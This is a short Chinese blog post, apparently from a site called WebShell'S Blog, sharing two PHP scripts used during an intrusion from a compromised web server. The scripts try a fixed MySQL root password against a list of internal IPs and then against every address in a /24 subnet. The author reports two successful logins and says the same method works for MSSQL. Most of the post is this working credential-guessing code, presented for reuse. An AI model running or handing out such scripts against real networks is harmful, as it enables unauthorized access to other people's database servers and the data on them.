MYSQL服务器猜密码脚本
昨日渗透时 , 整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。
这个是已知开了3306的。。
<?php
$hostdb = array(
'192.168.168.10',
'192.168.168.20',
'192.168.168.20',
'192.168.168.40',
'192.168.168.50',
'192.168.168.60',
'192.168.168.70',
'192.168.168.80',
'192.168.168.90',
'192.168.168.100'
);
$dbu = 'root';
$dbp = '1qaz2wsx';
foreach ($hostdb as $host) {
if(@mysql_connect($host, $dbu, $dbp)) {
echo $host.' - '.$dbu.' - '.$dbp.' ... OK<br>';
}
}
echo 'done.';
?>
举一反三,这是全段猜的。
<?php
$ips = '192.168.168.';
$dbu = 'root';
$dbp = '1qaz2wsx';
for ($i=1; $i<254; $i++) {
if(@mysql_connect($ips.$i, $dbu, $dbp)) {
echo $ips.$i.' - '.$dbu.' - '.$dbp.' ... OK<br>';
}
}
echo 'done.';
?>
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1134.html